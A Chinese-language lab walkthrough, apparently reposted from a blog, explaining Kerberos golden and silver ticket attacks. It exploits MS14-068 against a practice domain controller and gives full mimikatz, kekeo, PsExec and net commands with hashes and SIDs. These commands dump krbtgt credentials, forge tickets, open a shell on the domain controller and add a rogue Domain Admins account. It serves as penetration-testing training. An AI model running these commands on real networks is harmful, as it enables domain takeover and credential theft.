其他分享
首页 > 其他分享> > 域渗透PTT票据传递攻击(Pass the Ticket)

域渗透PTT票据传递攻击(Pass the Ticket)

作者:互联网

文中主要讲解内网域环境,通过学习掌握域环境,更快知晓内网工作原理。本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。

PTT 票据传递攻击(Pass the Ticket)

描述:

PTT票据传递主要根据kerberos协议&kerberos认证原理来进行攻击:
kerberos原理:打个比方:就好比A需要进入公司办公处,首先需要去门卫处验证是否是这个公司的人(也就是通过AS的认证);然后通过门卫确认后,拿着门卫的凭证(也就是我们所需要TGT)去办公处里面,这时候我们如果需要去领导办公室查询资料(就是访问Sever),那么就需要通过办公处的前台去登记,让前台确认我们是否有去查询的资格,当确认我们有资格后会给予凭证(就是ST),我们就可以拿着这个凭证去领导办公室查询资料了。
借用我们上面的比方:来带入我们kerberos中:

票据传递攻击:

域内常用的两种攻击方式,分别为黄金票据和白银票据:

黄金票据原理:

在 Kerberos 认证中,Client 通过 AS(身份认证服务)认证后,AS 会给 Client 一个Logon Session Key 和 TGT,而 Logon Session Key 并不会保存在 KDC 中,krbtgt 的NTLM Hash 又是固定的,所以只要得到 krbtgt 的 NTLM Hash,就可以伪造 TGT 和Logon Session Key 来进入下一步 Client 与 TGS 的交互。而已有了金票后,就跳过AS 验证,不用验证账户和密码,所以也不担心域管密码修改。

特点:

不需要与 AS 进行交互,需要用户 krbtgt 的 Hash。

MS14-068

这个漏洞的原理就和黄金票据相似,所以我们先来复现这个漏洞:

原理:

通过生成黄金票据,导入工具中,将一个普通权限的域用户获取域管的使用权限,从而达到控制整个域。
当获取域用户时,对这个域进行信息收集:
获取是否MS14-068相应补丁情况:

systeminfo | findstr "3011780"

返回为空则没有相应的补丁
在这里插入图片描述
ms14-068exp使用方法:

ms14-068.exe -u 域成员名@域名 -p 域成员密码 -s 域成员 sid -d 域控制器地址

收集域成员的SID:

whoami /all 
whoami /user #只单独查询SID

在这里插入图片描述
收集域管账号及域名称:

net time #获取域管账号
net config workstation #获取域信息
nltest /dsgetdc:moonsec #获取域管信息

在这里插入图片描述
在这里插入图片描述
构造成08server-dc.moonsec.fbi,在制作黄金票据中使用:
利用ms14-068的exp来生成一个黄金票据:

ms14-068.exe -u test@moonsec.fbi -p 123456 -s S-1-5-21-2801122135-3886333168-273474972-1103 -d 08server-dc.moonsec.fbi

在这里插入图片描述
这里我们可以先看下票据未导入前,是无法查看域控的C盘:

dir \\08server-dc.moonsec.fbi\C$  #这里必须使用计算机全名去查看,IP地址是不行的。

在这里插入图片描述
使用mimitakz导入票据:

kerberos::purge  #清空票据
kerberos::ptc 票据 #导入票据
kerberos::list #查看票据

在这里插入图片描述
再次查看域控的C盘,现在是可以访问的:

dir \\08server-dc.moonsec.fbi\C$

在这里插入图片描述
使用psexec反弹cmd:

Psexec64.exe /accepteula /s \\08server-dc.moonsec.fbi cmd.exe

在这里插入图片描述
将cmd反弹出来,即可创建域管账号:

net user Longwaer QWEasd123 /add /domain
net group "Domain Admins" Longwaer /add /domain

在这里插入图片描述

金票制作:

这里我们已经假设获得了域管权限,然后我们利用mimikatz导出krbtgt账号信息:

mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:moonsec.fbi /user:krbtgt" "exit">loghash.txt

在这里插入图片描述
利用mimikatz生成黄金票据:

mimikatz.exe "kerberos::golden /admin:system /domain:moonsec.fbi /sid:S-1-5-21-2801122135-3886333168-273474972 /krbtgt:811a536cf58aa23ceb8d439ffb386e6f /ticket:ticket.kirbi" exit

在这里插入图片描述
将票据注入内存:

kerberos::purge #清除票据
kerberos:: ptt 票据 #将票据注入内存

成功访问:
在这里插入图片描述

白银票据原理:

如果说黄金票据是伪造的 TGT,那么白银票据就是伪造的 ST。在 Kerberos 认证的第三部,Client 带着 ST 和 Authenticator3 向 Server 上的某个服务进行请求,Server 接收到 Client 的请求之后,通过自己的 Master Key 解密 ST,从而获得 Session Key。通过 Session Key 解密 Authenticator3,进而验证对方的身份,验证成功就让 Client 访问 server 上的指定服务了。所以我们只需要知道 Server 用户的 Hash 就可以伪造出一个 ST,且不会经过 KDC,但是伪造的门票只对部分服务起作用。

特点:

不需要与KDC进行交互;需要server的NTLM hash。

银票制作:

假设我们已经获得域管权限,使用mimikatz导出信息:

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit">log.txt

在这里插入图片描述
然后利用server的NTLM hash制作银票:
使用方法:

kerberos::golden /domain:<域名> /sid:<域 SID> /target:<目标服务器主机名> /service:<服务类型> /rc4:<NTLM Hash> /user:<用户名> /ptt
kerberos::purge
kerberos::golden /domain:moonsec.fbi /sid:S-1-5-21-2801122135-3886333168-273474972 /target:08server-dc.moonsec.fbi /service:cifs /rc4:d0584c0b6d8ef7693ecaca2469348555 /user:administrator /ptt

这里rc4:使用的是08server-dc的ntlm hash
在这里插入图片描述
在这里插入图片描述

使用kekeo,制作银票:

tgt::ask /user:administrator /domain:moonsec.fbi /ntlm:42e2656ec24331269f82160ff5962387
kerberos::ptt 票据 

在这里插入图片描述

金票和银票之前的区别:

获取的权限不同
金票:伪造的 TGT,可以获取任意 Kerberos 的访问权限
银票:伪造的 ST,只能访问指定的服务,如 CIFS
认证流程不同
金票:同 KDC 交互,但不同 AS 交互
银票:不同 KDC 交互,直接访问 Server
加密方式不同
金票:由 krbtgt NTLM Hash 加密
银票:由服务账号 NTLM Hash 加密

标签:kerberos,fbi,Server,Client,票据,Pass,Ticket,PTT,moonsec
来源: https://blog.csdn.net/nicai321/article/details/122614894